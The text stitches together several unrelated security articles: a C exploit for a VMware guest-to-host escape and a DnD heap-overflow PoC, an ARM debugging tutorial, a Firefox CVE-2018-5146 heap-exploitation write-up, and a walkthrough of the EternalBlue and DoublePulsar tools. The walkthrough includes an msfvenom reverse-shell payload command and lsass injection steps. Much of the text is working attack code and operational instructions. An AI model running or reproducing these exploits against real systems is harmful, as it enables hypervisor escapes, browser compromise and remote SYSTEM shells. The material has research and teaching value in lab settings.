91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
char *initial_dnd = "tools.capability.dnd_version 4";
static const int cbObj = 0x100;
char *second_dnd = "tools.capability.dnd_version 2";
char *chgver = "vmx.capability.dnd_version";
char *call_transport = "dnd.transport ";
char *readstring = "ToolsAutoInstallGetParams";
typedef struct _DnDCPMsgHdrV4
{
    char magic[14];
    char dummy[2];
    size_t ropper[13];
    char shellcode[175];
    char padding[0x80];
} DnDCPMsgHdrV4;


void PrepareLFH()
{
    char *result = NULL;
    char *pObj = malloc(cbObj);
    memset(pObj, 'A', cbObj);
    pObj[cbObj - 1] = 0;
    for (int idx = 0; idx < 1; ++idx) // just occupy 1
    {
        char *spary = stringf("info-set guestinfo.k%d %s", idx, pObj);
        RpcOut_SendOneRaw(spary, strlen(spary), &result, NULL); //alloc one to occupy 4
    }
    free(pObj);
}

size_t infoleak()
{
#define MAX_LFH_BLOCK 512
    Message_Channel *chans[5] = {0};
    for (int i = 0; i < 5; ++i)
    {
        chans[i] = Message_Open(0x49435052);
        if (chans[i])
        {
            Message_SendSize(chans[i], cbObj - 1); //just alloc
        }
        else
        {
            Message_Close(chans[i - 1]); //keep 1 channel valid
            chans[i - 1] = 0;
            break;
        }
    }
    PrepareLFH(); //make sure we have at least 7 hole or open and occupy next LFH block
    for (int i = 0; i < 5; ++i)
    {
        if (chans[i])
        {
            Message_Close(chans[i]);
        }
    }

    char *result = NULL;
    char *pObj = malloc(cbObj);
    memset(pObj, 'A', cbObj);
    pObj[cbObj - 1] = 0;
    char *spary2 = stringf("guest.upgrader_send_cmd_line_args %s", pObj);
    while (1)
    {
        for (int i = 0; i < MAX_LFH_BLOCK; ++i)
        {
            RpcOut_SendOneRaw(tov4, strlen(tov4), &result, NULL);
            RpcOut_SendOneRaw(chgver, strlen(chgver), &result, NULL);
            RpcOut_SendOneRaw(tov2, strlen(tov2), &result, NULL);
            RpcOut_SendOneRaw(chgver, strlen(chgver), &result, NULL);
        }

        for (int i = 0; i < MAX_LFH_BLOCK; ++i)
        {
            Message_Channel *chan = Message_Open(0x49435052);
            if (chan == NULL)
            {
                puts("Message send error!");
                Sleep(100);
            }
            else
            {
                Message_SendSize(chan, cbObj - 1);
                Message_RawSend(chan, "\xA0\x75", 2); //just ret
                Message_Close(chan);
            }
        }
        Message_Channel *chan = Message_Open(0x49435052);
        Message_SendSize(chan, cbObj - 1);
        Message_RawSend(chan, "\xA0\x74", 2);                                 //free
        RpcOut_SendOneRaw(dndtransport, strlen(dndtransport), &result, NULL); //trigger double free
        for (int i = 0; i < min(cbObj-3,MAX_LFH_BLOCK); ++i)
        {
            RpcOut_SendOneRaw(spary2, strlen(spary2), &result, NULL);
            Message_RawSend(chan, "B", 1);
            RpcOut_SendOneRaw(readstring, strlen(readstring), &result, NULL);
            if (result[0] == 'A' && result[1] == 'A' && strcmp(result, pObj))
            {
               Message_Close(chan); //free the string
                for (int i = 0; i < MAX_LFH_BLOCK; ++i)
                {
                    puts("Trying to leak vtable");
                    RpcOut_SendOneRaw(tov4, strlen(tov4), &result, NULL);
                    RpcOut_SendOneRaw(chgver, strlen(chgver), &result, NULL);
                    RpcOut_SendOneRaw(readstring, strlen(readstring), &result, NULL);
                    size_t p = 0;
                    if (result)
                    {
                        memcpy(&p, result, min(strlen(result), 8));
                        printf("Leak content: %p\n", p);
                    }
                    size_t low = p & 0xFFFF;
                    if (low == 0x74A8 || //RpcBase
                        low == 0x74d0 || //CpV4
                        low == 0x7630)   //DnDV4
                    {
                        printf("vmware-vmx base: %p\n", (p & (~0xFFFF)) - 0x7a0000);
                        return (p & (~0xFFFF)) - 0x7a0000;
                    }
                    RpcOut_SendOneRaw(tov2, strlen(tov2), &result, NULL);
                    RpcOut_SendOneRaw(chgver, strlen(chgver), &result, NULL);
                }
            }
        }
        Message_Close(chan);
    }
    return 0;
}

void exploit(size_t base)
{
    char *result = NULL;
    char *uptime_info = stringf("SetGuestInfo -7-%I64u", 0x41414141);
    char *pObj = malloc(cbObj);
    memset(pObj, 0, cbObj);

    DnDCPMsgHdrV4 *hdr = malloc(sizeof(DnDCPMsgHdrV4));
    memset(hdr, 0, sizeof(DnDCPMsgHdrV4));
    memcpy(hdr->magic, call_transport, strlen(call_transport));
    while (1)
    {
        RpcOut_SendOneRaw(second_dnd, strlen(second_dnd), &result, NULL);
        RpcOut_SendOneRaw(chgver, strlen(chgver), &result, NULL);
        for (int i = 0; i < MAX_LFH_BLOCK; ++i)
        {
            Message_Channel *chan = Message_Open(0x49435052);
            Message_SendSize(chan, cbObj - 1);
            size_t fake_vtable[] = {
                base + 0xB87340,
                base + 0xB87340,
                base + 0xB87340,
                base + 0xB87340};

            memcpy(pObj, &fake_vtable, sizeof(size_t) * 4);

            Message_RawSend(chan, pObj, sizeof(size_t) * 4);
            Message_Close(chan);
        }
        RpcOut_SendOneRaw(uptime_info, strlen(uptime_info), &result, NULL);
        RpcOut_SendOneRaw(hdr, sizeof(DnDCPMsgHdrV4), &result, NULL);
        //check pwn success?
        RpcOut_SendOneRaw(readstring, strlen(readstring), &result, NULL);
        if (*(size_t *)result == 0xdeadbeefc0debabe)
        {
            puts("VMware escape success! \nPwned by KeenLab, Tencent");
            RpcOut_SendOneRaw(initial_dnd, strlen(initial_dnd), &result, NULL);//fix dnd to callable prevent vmtoolsd problem
            RpcOut_SendOneRaw(chgver, strlen(chgver), &result, NULL);
            return;
        }
        //host dndv4 fill in, try to clean up and free again
        Sleep(100);
        puts("Object wrong! Retry...");
        RpcOut_SendOneRaw(initial_dnd, strlen(initial_dnd), &result, NULL);
        RpcOut_SendOneRaw(chgver, strlen(chgver), &result, NULL);
    }
}

int main(int argc, char *argv[])
{
    int ret = 1;
    __try
    {
        while (1)
        {
            size_t base = 0;
            do
            {
                puts("Leaking...");
                base = infoleak();
            } while (!base);
            puts("Pwning...");
            exploit(base);
            break;
        }
    }
    __except (ExceptionIsBackdoor(GetExceptionInformation()) ? EXCEPTION_EXECUTE_HANDLER : EXCEPTION_CONTINUE_SEARCH)
    {
        fprintf(stderr, NOT_VMWARE_ERROR);
        return 1;
    }
    return ret;
}

CVE-2017-4901 DnDv3 HeapOverflow

The drag-and-drop (DnD) function in VMware Workstation and Fusion has an out-of-bounds memory access vulnerability. This may allow a guest to execute code on the operating system that runs Workstation or Fusion.

After VMware released 12.5.3, we continued auditing the DnD and finally found another heap overflow bug similar to CVE-2016-7461. This bug was known by almost every participants of VMware category in Pwn2own 2017. Here we present the PoC of this bug.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
void poc()
{
    int n;
    char *req1 = "tools.capability.dnd_version 3";
    char *req2 = "vmx.capability.dnd_version";
    RpcOut_SendOneRaw(req1, strlen(req1), NULL, NULL);
    RpcOut_SendOneRaw(req2, strlen(req2), NULL, NULL);

    char req3[0x80] = "dnd.transport ";
    n = strlen(req3);
    *(int*)(req3+n) = 3;
    *(int*)(req3+n+4) = 0;
    *(int*)(req3+n+8) = 0x100;
    *(int*)(req3+n+0xc) = 0;
    *(int*)(req3+n+0x10) = 0;
    // allocate buffer of 0x100 bytes
    RpcOut_SendOneRaw(req3, n+0x14, NULL, NULL);

    char req4[0x1000] = "dnd.transport ";
    n = strlen(req4);
    *(int*)(req4+n) = 3;
    *(int*)(req4+n+4) = 0;
    *(int*)(req4+n+8) = 0x1000;
    *(int*)(req4+n+0xc) = 0x800;
    *(int*)(req4+n+0x10) = 0;
    for (int i = 0; i < 0x800; ++i)
        req4[n+0x14+i] = 'A';
    // overflow with 0x800 bytes of 'A'
    RpcOut_SendOneRaw(req4, n+0x14+0x800, NULL, NULL);
}

Conclusions

In this article we presented several VMware bugs leading to guest to host virtual machine escape.
We hope to have demonstrated that not only VM breakouts are possible and real, but also that a determined attacker can achieve multiple of them, and with good reliability.
We feel that in our industry there is the misconception that if untrusted software runs inside a VM, then we will be safe.
Think about the malware industry, which heavily relies on VMs for analysis, or the entire cloud which basically runs on hypervisors.
For sure it’s an additional protection layer, raising the bar for an attacker to get full compromise, so it’s a very good practice to adopt it.
But we must not forget that essentially it’s just another “layer of sandboxing” which can be bypassed or escaped.
So great care must be taken to secure also this security layer.

ARM Reverse Engineering – Hacking Double Variables

Let’s review our code.

int main(void) {

            double myNumber = 1337.77;

 

            std::cout << myNumber << std::endl;

 

            return 0;

}

Let’s debug!

Let’s set a breakpoint at main+24 and continue.

We see the strd r2, [r11, #-12] and we have to fully understand that this means we are storing the value at the offset of -12 from register r11 into r2. Let’s now examine what exactly resides there.

Voila! We see 1337.77 at that offset location or specifically stored into 0x7efff230 in memory.

Let’s step into twice which executes the vldr d0, [r11, #-12] as we understand that 1337.77 will now be loaded into the double precision math coprocessor d0 register. Let’s now print the value at that location below.

Let’s hack the d0 register!

Now let’s reexamine the value inside d0.

Let’s continue.

Successfully hacked!

Writeup for CVE-2018-5146 or How to kill a (Fire)fox – en

1. Debug Environment

  • OS
    • Windows 10
  • Firefox_Setup_59.0.exe
    • SHA1: 294460F0287BCF5601193DCA0A90DB8FE740487C
  • Xul.dll
    • SHA1: E93D1E5AF21EB90DC8804F0503483F39D5B184A9

2. Patch Infomation

The issue in Mozilla’s Bugzilla is Bug 1446062.
The vulnerability used in pwn2own 2018 is assigned with CVE-2018-5146.
From the Mozilla security advisory, we can see this vulnerability came from libvorbis – a third-party media library. In next section, I will introduce some base information of this library.

3. Ogg and Vorbis

3.1. Ogg

Ogg is a free, open container format maintained by the Xiph.Org Foundation.
One “Ogg file” consist of some “Ogg Page” and one “Ogg Page” contains one Ogg Header and one Segment Table.
The structure of Ogg Page can be illustrate as follow picture.

Pic.1 Ogg Page Structure

3.2. Vorbis

Vorbis is a free and open-source software project headed by the Xiph.Org Foundation.
In a Ogg file, data relative to Vorbis will be encapsulated into Segment Table inside of Ogg Page.
One MIT document show the process of encapsulation.

3.2.1. Vorbis Header

In Vorbis, there are three kinds of Vorbis Header. For one Vorbis bitstream, all three kinds of Vorbis header shound been set. And those Header are:

  • Vorbis Identification Header
    Basically define Ogg bitstream is in Vorbis format. And it contains some information such as Vorbis version, basic audio information relative to this bitstream, include number of channel, bitrate.
  • Vorbis Comment Header
    Basically contains some user define comment, such as Vendor infomation。
  • Vorbis Setup Header
    Basically contains information use to setup codec, such as complete VQ and Huffman codebooks used in decode.
3.2.2. Vorbis Identification Header

Vorbis Identification Header structure can be illustrated as follow:

Pic.2 Vorbis Identification Header Structure

3.2.3. Vorbis Setup Header

Vorbis Setup Heade Structure is more complicate than other headers, it contain some substructure, such as codebooks.
After “vorbis” there was the number of CodeBooks, and following with CodeBook Objcet corresponding to the number. And next was TimeBackends, FloorBackends, ResiduesBackends, MapBackends, Modes.
Vorbis Setup Header Structure can be roughly illustrated as follow:

Pic.3 Vorbis Setup Header Structure

3.2.3.1. Vorbis CodeBook

As in Vorbis spec, a CodeBook structure can be represent as follow:

byte 0: [ 0 1 0 0 0 0 1 0 ] (0x42)
byte 1: [ 0 1 0 0 0 0 1 1 ] (0x43)
byte 2: [ 0 1 0 1 0 1 1 0 ] (0x56)
byte 3: [ X X X X X X X X ]
byte 4: [ X X X X X X X X ] [codebook_dimensions] (16 bit unsigned)
byte 5: [ X X X X X X X X ]
byte 6: [ X X X X X X X X ]
byte 7: [ X X X X X X X X ] [codebook_entries] (24 bit unsigned)
byte 8: [ X ] [ordered] (1 bit)
byte 8: [ X 1 ] [sparse] flag (1 bit)

After the header, there was a length_table array which length equal to codebook_entries. Element of this array can be 5 bit or 6 bit long, base on the flag.
Following as VQ-relative structure:

[codebook_lookup_type] 4 bits
[codebook_minimum_value] 32 bits
[codebook_delta_value] 32 bits
[codebook_value_bits] 4 bits and plus one
[codebook_sequence_p] 1 bits

Finally was a VQ-table array with length equal to codebook_dimensions * codebook_entrue,element length Corresponding to codebood_value_bits.
Codebook_minimum_value and codebook_delta_value will be represent in float type, but for support different platform, Vorbis spec define a internal represent format of “float”, then using system math function to bake it into system float type. In Windows, it will be turn into double first than float.
All of above build a CodeBook structure.

3.2.3.2. Vorbis Time

In nowadays Vorbis spec, this data structure is nothing but a placeholder, all of it data should be zero.

3.2.3.3. Vorbis Floor

In recent Vorbis spec, there were two different FloorBackend structure, but it will do nothing relative to vulnerability. So we just skip this data structure.

3.2.3.4. Vorbis Residue

In recent Vorbis spec, there were three kinds of ResidueBackend, different structure will call different decode function in decode process. It’s structure can be presented as follow:

[residue_begin] 24 bits
[residue_end] 24 bits
[residue_partition_size] 24 bits and plus one
[residue_classifications] = 6 bits and plus one
[residue_classbook] 8 bits

The residue_classbook define which CodeBook will be used when decode this ResidueBackend.
MapBackend and Mode dose not have influence to exploit so we skip them too.

4. Patch analysis

4.1. Patched Function

From blog of ZDI, we can see vulnerability inside following function:

/* decode vector / dim granularity gaurding is done in the upper layer */
long vorbis_book_decodev_add(codebook *book, float *a, oggpack_buffer *b, int n)
{
if (book->used_entries > 0)
{
int i, j, entry;
float *t;

if (book->dim > 8)
{
for (i = 0; i < n;) {
entry = decode_packed_entry_number(book, b);
if (entry == -1) return (-1);
t = book->valuelist + entry * book->dim;
for (j = 0; j < book->dim;)
{
a[i++] += t[j++];
}
}
else
{
// blablabla
}
}
return (0);
}

Inside first if branch, there was a nested loop. Inside loop use a variable “book->dim” without check to stop loop, but it also change a variable “i” come from outer loop. So if ”book->dim > n”, “a[i++] += t[j++]” will lead to a out-of-bound-write security issue.

In this function, “a” was one of the arguments, and t was calculate from “book->valuelist”.

4.2. Buffer – a

After read some source , I found “a” was initialization in below code:

    /* alloc pcm passback storage */
vb->pcmend=ci->blocksizes[vb->W];
vb->pcm=_vorbis_block_alloc(vb,sizeof(*vb->pcm)*vi->channels);
for(i=0;ichannels;i++)
vb->pcm[i]=_vorbis_block_alloc(vb,vb->pcmend*sizeof(*vb->pcm[i]));

The “vb->pcm[i]” will be pass into vulnerable function as “a”, and it’s memory chunk was alloc by _vorbis_block_alloc with size equal to vb->pcmend*sizeof(*vb->pcm[i]).
And vb->pcmend come from ci->blocksizes[vb->W], ci->blocksizes was defined in Vorbis Identification Header.
So we can control the size of memory chunk alloc for “a”.
Digging deep into _vorbis_block_alloc, we can found this call chain _vorbis_block_alloc -> _ogg_malloc -> CountingMalloc::Malloc -> arena_t::Malloc, so the memory chunk of “a” was lie on mozJemalloc heap.

4.3. Buffer – t

After read some source code , I found book->valuelist get its value from here:

    c->valuelist=_book_unquantize(s,n,sortindex);

And the logic of _book_unquantize can be show as follow:

float *_book_unquantize(const static_codebook *b, int n, int *sparsemap)
{
long j, k, count = 0;
if (b->maptype == 1 || b->maptype == 2)
{
int quantvals;
float mindel = _float32_unpack(b->q_min);
float delta = _float32_unpack(b->q_delta);
float *r = _ogg_calloc(n * b->dim, sizeof(*r));

switch (b->maptype)
{
case 1:

quantvals=_book_maptype1_quantvals(b);

// do some math work

break;
case 2:

float val=b->quantlist[j*b->dim+k];

// do some math work

break;
}

return (r);
}
return (NULL);
}

So book->valuelist was the data decode from corresponding CodeBook’s VQ data.
It was lie on mozJemalloc heap too.

4.4. Cola Time

So now we can see, when the vulnerability was triggered:

  • a
    • lie on mozJemalloc heap;
    • size controllable.
  • t
    • lie on mozJemalloc heap too;
    • content controllable.
  • book->dim
    • content controllable.

Combine all thing above, we can do a write operation in mozJemalloc heap with a controllable offset and content.
But what about size controllable? Can this work for our exploit? Let’s see how mozJemalloc work.

5. mozJemalloc

mozJemalloc is a heap manager Mozilla develop base on Jemalloc.
Following was some global variables can show you some information about mozJemalloc.

  • gArenas
    • mDefaultArena
    • mArenas
    • mPrivateArenas
  • gChunkBySize
  • gChunkByAddress
  • gChunkRTress

In mozJemalloc, memory will be divide into Chunks, and those chunk will be attach to different Arena. Arena will manage chunk. User alloc memory chunk must be inside one of the chunks. In mozJemalloc, we call user alloc memory chunk as region.
And Chunk will be divide into run with different size.Each run will bookkeeping region status inside it through a bitmap structure.

5.1. Arena

In mozJemalloc, each Arena will be assigned with a id. When allocator need to alloc a memory chunk, it can use id to get corresponding Arena.
There was a structure call mBin inside Arena. It was a array, each element of it wat a arena_bin_t object, and this object manage all same size memory chunk in this Arena. Memory chunk size from 0x10 to 0x800 will be managed by mBin.
Run used by mBin can not be guarantee to be contiguous, so mBin using a red-black-tree to manage Run.

5.2. Run

The first one region inside a Run will be use to save Run manage information, and rest of the region can be use when alloc. All region in same Run have same size.
When alloc region from a Run, it will return first No-in-use region close to Run header.

5.3. Arena Partition

This now code branch in mozilla-central, all JavaScript memory alloc or free will pass moz_arena_ prefix function. And this function will only use Arena which id was 1.
In mozJemalloc, Arena can be a PrivateArena or not a PrivateArena. Arena with id 1 will be a PrivateArena. So it means that ogg buffer will not be in the same Arena with JavaScript Object.
In this situation, we can say that JavaScript Arena was isolated with other Arenas.
But in vulnerable Windows Firefox 59.0 does not have a PrivateArena, so that we can using JavaScript Object to perform a Heap feng shui to run a exploit.
First I was debug in a Linux opt+debug build Firefox, as Arena partition, it was hard to found a way to write a exploit, so far I can only get a info leak situation in Linux.

6. Exploit

In the section, I will show how to build a exploit base on this vulnerability.

6.1. Build Ogg file

First of all, we need to build a ogg file which can trigger this vulnerability, some of PoC ogg file data as follow:

Pic.4 PoC Ogg file partial data
We can see codebook->dim equal to 0x48。

6.2. Heap Spary

First we alloc a lot JavaScript avrray, it will exhaust all useable memory region in mBin, and therefore mozJemalloc have to map new memory and divide it into Run for mBin.
Then we interleaved free those array, therefore there will be many hole inside mBin, but as we can never know the original layout of mBin, and there can be other object or thread using mBin when we free array, the hole may not be interleaved.
If the hole is not interleaved, our ogg buffer may be malloc in a contiguous hole, in this situation, we can not control too much off data.
So to avoid above situation, after interleaved free, we should do some compensate to mBin so that we can malloc ogg buffer in a hole before a array.

6.3. Modify Array Length

After Heap Spary,we can use _ogg_malloc to malloc region in mozJemalloc heap.
So we can force a memory layout as follow:

|———————contiguous memory —————————|
[ hole ][ Array ][ ogg_malloc_buffer ][ Array ][ hole ]

And we trigger a out-of-bound write operation, we can modify one of the array’s length. So that we have a array object in mozJemalloc which can read out-of-bound.
Then we alloc many ArrayBuffer Object in mozJemalloc. Memory layout turn into following situation:

|——————————-contiguous memory —————————|
[ Array_length_modified ][ something ] … [ something ][ ArrayBuffer_contents ]

In this situation, we can use Array_length_modified to read/write ArrayBuffer_contents.
Finally memory will like this:

|——————————-contiguous memory —————————|
[ Array_length_modified ][ something ] … [ something ][ ArrayBuffer_contents_modified ]

6.4. Cola time again

Now we control those object and we can do:

  • Array_length_modified
    • Out-of-bound write
    • Out-of-bound read
  • ArrayBuffer_contents_modified
    • In-bound write
    • In-bound read

If we try to leak memory data from Array_length_modified, due to SpiderMonkey use tagged value, we will read “NaN” from memory.
But if we use Array_length_modified to write something in ArrayBuffer_contents_modified, and read it from ArrayBuffer_contents_modified. We can leak pointer of Javascript Object from memory.

6.5. Fake JSObject

We can fake a JSObject on memory by leak some pointer and write it into JavasScript Object. And we can write to a address through this Fake Object. (turn off baselineJIT will help you to see what is going on and following contents will base on baselineJIT disable)

Pic.5 Fake JavaScript Object

If we alloc two arraybuffer with same size, they will in contiguous memory inside JS::Nursery heap. Memory layout will be like follow

|———————contiguous memory —————————|
[ ArrayBuffer_1 ]
[ ArrayBuffer_2 ]

And we can change first arraybuffer’s metadata to make SpiderMonkey think it cover second arraybuffer by use fake object trick.

|———————contiguous memory —————————|
[ ArrayBuffer_1 ]
[ ArrayBuffer_2 ]

We can read/write to arbitrarily memory now.
After this, all you need was a ROP chain to get Firefox to your shellcode.

6.6. Pop Calc?

Finally we achieve our shellcode, process context as follow:

Pic.6 achieve shellcode
Corresponding memory chunk information as follow:

Pic.7 memory address information

But Firefox release have enable Sandbox as default, so if you try to pop calc through CreateProcess, Sandbox will block it.

7. Relative code and works

  1. Firefox Source Code
  2. OR’LYEH? The Shadow over Firefox by argp
  3. Exploiting the jemalloc Memory Allocator: Owning Firefox’s Heap by argp,haku
  4. QUICKLY PWNED, QUICKLY PATCHED: DETAILS OF THE MOZILLA PWN2OWN EXPLOIT by thezdi

 

From git clone to Pwned — Owning Windows with DoublePulsar and EternalBlue

By now, you’ve likely heard about the Shadow Brokers and their alleged NSA tool dump. Regardless of whether you believe it was or was not the toolset of a nation-state actor, at least one thing is true: this stuff works, and it works well.

In this blog series I’ll walk through some of what I’ve learned from the dump, focusing specifically on two tools: Eternal Blue, a tool for backdooring Windows via MS17-010, and DoublePulsar, an exploit that allows you to inject DLLs through the established backdoor, or inject your own shellcode payload. In this first post, we’ll walk through setting up the environment and getting the front-end framework, Fuzzbunch, to run.

tl;dr — sweet nation-state level hax, remote unauthenticated attacks that pop shells as NT AUTHORITY\System. Remember MS08-067? Yeah, like that.

Setting up the environment

  1. To get going, fire up a Windows 7 host in a virtual machine. Dont worry about the specs; all of my research and testing has been done in a Virtualbox VM with 1GB ram, 1 CPU core, and a 25GB hard drive.
  2. First and foremost, git clone (or download the zip) of the Shadowbrokers Dump. You should be able to grab it from x0rz’ github.
  3. The exploits run through a framework not entirely unlike Metasploit. The framework itself runs in Python, so we need to grab a copy of Python 2.6 for Windows. If you catch yourself wondering why you’re installing a 9 year old copy of Python, remember that the dump is from 2013, and the tools had been in use for a while. Fire up the DeLorean because we’re about to go way back.
  4. Add Python to your environmental path by going to Control Panel > System > Advanced System Settings > Environmental Variables and add C:\Python26 to the PATH field.
  5. Because you’re running Python on Windows, there are a bunch of dependencies you’ll need to install. The easiest way to overcome this is to install the Python for Windows Extensions, also known as PyWin. Grab a copy of PyWin 2.6 here.
  6. PyWin will very likely fail on its final step. No problem: open an administrator command prompt, cd C:\python26\scripts and run python pywin32_postinstall.py --install. Python and its dependencies should now be installed.
  7. We’re now ready to launch the Fuzzbunch Framework. Navigate to the folder you downloaded the exploits, and cd windows. You’ll need to create a folder called listeningposts or the next step will fail; so, mkdir listeningposts.
  8. You should now be able to launch Fuzzbunch — use python fb.py to kick it off.

Thats about it to get the software running. You’ll be asked a few questions, such as your Target IP, Callback IP (your local IP address), and whether you want to use Redirection. For now, choose no. Fuzzbunch will ask for a Logs directory — this is a pretty cool feature that stores your attack history and lets you resume from where you left off. Create a Logs directory somewhere.

At this point I’d encourage you to explore the interface; its fairly intuitive, sharing many commands with Metasploit (including help and ? — hint hint). In the next post, we’ll launch an actual attack through Meterpreter and Powershell Empire DLLs.

By now, your environment is configured, you’ve been able to launch the Fuzzbunch framework, and you’re probably ready to hack something. In this article we’ll go through the process of using EternalBlue to create a backdoor. I’m going to make the following assumptions:

  1. You have configured a local VM network with 1 Windows attack machine and 1 Windows 7 victim machine.
  2. You have gone through the first blog post and can launch the Fuzzbunch framework.
  3. You have basic command of the Windows operating system and command line.

For reference, in my lab environment, this is the setup:

  1. Attacker Box — 10.0.2.5. Windows 7 SP1 x64.
  2. Kali Box — 10.0.2.15. Kali Rolling. (We’ll use this in Part 3)
  3. Victim Box — 10.0.2.7. Windows 7 SP1 x64, without the MS17-010 patches applied.

In the next tutorial we’re going to use the DLL injection function in DoublePulsar — however, the first step in this process is to backdoor the Victim with Eternal Blue. Launch Fuzzbunch, and enter the following:

Default Target IP Address []: 10.0.2.7
Default Callback IP Address []: 10.0.2.5
Use Redirection [yes]: no
Base Log directory [D:\logs]: c:\fb_logs

If you have run Fuzzbunch in the past, you may see a list of projects. If this is your first run, you’ll see a prompt to select or create a new project. Select [0] to create a new project. Give it a name, and you should see something like this:

Time to backdoor our Windows box. Remember that exploits run through EternalBlue (the backdoor itself), so this is a critical step.

  1. Type use eternalblue
  2. Fuzzbunch populates your options with defaults. The good news is, this is mostly correct out of the box. It’ll ask if you want to be prompted for variables — lets go through this, as there is one default we’re going to change. Types yes or hit enter to continue.
  3. NetworkTimeout [60]: This is fine unless youre on a slow link. Hit enter. If you notice timeouts, come back to this section and bump it up to 90 or 120 seconds.
  4. TargetIP [10.0.2.7]: This should be what you entered when starting Fuzzbunch. If you need to retype it, do so now — otherwise, hit enter.
  5. TargetPort [445]: EternalBlue targets SMB. If your SMB port is not 445 (which is standard), enter it here. For everyone else, hit enter.
  6. VerifyTarget [True]: You can set this to False to speed things up — but its a good idea to verify the target exists and is vulnerable before firing things off.
  7. VerifyBackdoor [True]: Verify that your backdoor exploit actually succeeds.
  8. MaximumExploitAttempts [3]: How many times should EternalBlue attempt to install the backdoor? I have seen EternalBlue fail the first attempt and succeed the second — so I’d recommend leaving it at 3.
  9. GroomAllocations [12]: The number of SMB Buffers to use. Accept the defaults.
  10. Target [WIN72K8R2]: In our example, we’re targetting Windows 7. If you’re using XP, select the appropriate option.
  11. Mode :: Delivery Mechanism [FB]: We’re going to use Fuzzbunch. In a future post, we’ll discuss DARINGNEOPHYTE.
  12. Fuzzbunch Confirmation: This confirms that you want to use Fuzzbunch.
  13. Destination IP [10.0.2.7]: This is for your local tunnel. In our example, keep it as default
  14. Destination Port [445]: As per above, this is for your local tunnel. Accept the default.
  15. You should now see a summary of the configured EternalBlue module, as seen below:

Everything look good? Hit enter, and we’ll see Fuzzbunch backdoor the victim machine. This happens quick, but the authors have made a point of a celebratory =-=-=WIN=-=-= banner.

Here’s the exploit in its entirety, from answering yes to a successful backdoor.

Note that EternalBlue checks for the existance of a backdoor before continuing. If you see =-=-=-=-=WIN=-=-=-=-= toward the end, and a green [+] Eternalblue Succeeded message then congratulations! You’ve just launched a nation state exploit against an unsuspecting lab machine. I’d suggest running through these steps again, right away, to see how things play out when you try to backdoor a box that has already been backdoored with EternalBlue. In the next post, we’ll pop a Meterpreter shell as NT Authority\System in minutes flat.

To recap where we are so far: You’ve installed Python 2.6 and its prerequisites. You can launch Fuzzbunch without errors, and you’ve backdoored your Victim box. You have a Windows Attack box, a Windows Victim Box, and a Kali box — and all three are on the same network and can communicate with each other. Please revisit the previous posts if this doesn’t describe your situation. Otherwise, lets hack things.

Now that we have a backdoor installed, we’re going to inject a Meterpreter DLL into a running process on your victim machine, and get a shell as NT Authority\System, the equivalent of root on a Windows box. For this section of the process, I’ll assume the following:

  1. You are familiar with the Linux command line.
  2. You have basic familairity with Metasploit, specifically the msfconsole and msvenom tools. If you arent familiar with these, Offensive Security’s Metasploit Unleashed is a great primer available for free.
  3. You have backdoored your Victim box successfully.

Creating the Meterpreter payload and starting your Kali listener
Let’s start by creating a malicious DLL file. The DLL we create is going to run the payload windows/x64/meterpreter/reverse_tcp which creates a 64-bit Meterpreter Reverse TCP connection to an IP address we specify. As noted in Part 2, my Kali system is located at 10.0.2.15.

  1. Use the following command to generate the DLL: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.2.15 LPORT=9898 -f dll -o meterpreter.dll. This uses the payload mentioned, connecting back to 10.0.2.15, on port 9898. It uses the DLL format and outputs the payload to a file called meterpreter.dll.
  2. Copy the DLL over to your Windows Attack box. How you do this is up to you, but a quick and dirty way is to run python -m SimpleHTTPServer on your Kali box, and use a web browser from the Windows Attack box to browse to http://10.0.2.15:8000 and download it directly.
  3. Start up msfconsole on Kali and use exploit/multi/handler. We’re going to catch our shell here — so use the parameters you set in the DLL by typing set LPORT 9898. You can probably get away without setting the LHOST, but if you want to be sure, type set LHOST 10.0.2.15 as well. Finally, I had some issues with the exploit failing when I didnt set a payload manually. Avoid that by typing set PAYLOAD windows/x64/meterpreter/reverse_tcp. Lastly, type exploit to start your listener. Lots of info in this step, so here’s what you should see:
  1. If everything looks good, its time to go back to the Windows Attack box. Fire up Fuzzbunch if its not already running, and use doublepulsar.

Injecting the DLL and catching a shell

Like EternalBlue, DoublePulsar will attempt to fill in default module settings for you. We’re going to change things, so when you see Prompt for Variable Settings? [Yes]:, hit enter.

  1. NetworkTimeout [60]: This is fine unless youre on a slow link. Hit enter. If you notice timeouts, come back to this section and bump it up to 90 or 120 seconds.
  2. TargetIP [10.0.2.7]: This should be what you entered when starting Fuzzbunch. If you need to retype it, do so now — otherwise, hit enter.
  3. TargetPort [445]: DoublePulsar targets SMB. If your SMB port is not 445 (which is standard), enter it here. For everyone else, hit enter.
  4. Protocol: Since we’re using SMB here, make sure SMB is selected.
  5. Architecture: Make sure you have this set correctly. If you use x86 on an x64 box, you’ll get a blue screen of death.
  6. Function: DoublePulsar can run shellcode, or run a DLL. Select 2 to Run a DLL.
  7. DllPayload []: This is the full path to your Meterpreter DLL; for example, C:\temp\meterpreter.dll
  8. DllOrdinal [1]: DLL files call functions by ordinal numbers instead of names. Unfortunately this is out of my scope of knowledge — in my experimentation, I used trial and error until an ordinal number worked. In this case, set your ordinal to 1. If 1 is incorrect, you’ll quickly find out via a blue screen of death, nothing happening at all, or the RPC server on the Victim box crashing. Know a great way to determine the ordinal? Please drop me a line.
  9. ProcessName [lsass.exe]: The process name you’ll inject into. This is your call — pick something run as NT Authority\System, that is also unlikely to crash when disturbed, and is likely to exist and be running on the Victim machine. DoublePulsar uses lsass.exe by default — this works fine, but some Meterpreter actions (such as hashdump) will likely cause it to crash. You can consider spoolsv.exeSearchIndexer.exe, and lsm.exe as well — experiement a bit with this field.
  10. ProcessCommand []: Optional, the process command line to inject into. Leave this blank.
  11. Destination IP [10.0.2.7]: Local tunnel IP. For this scenario, leave it as default.
  12. Destination Port [445]: Local tunnel port. Again, we’ll leave this default.

You should now have a summary of the changes you’ve made, which should look like this:

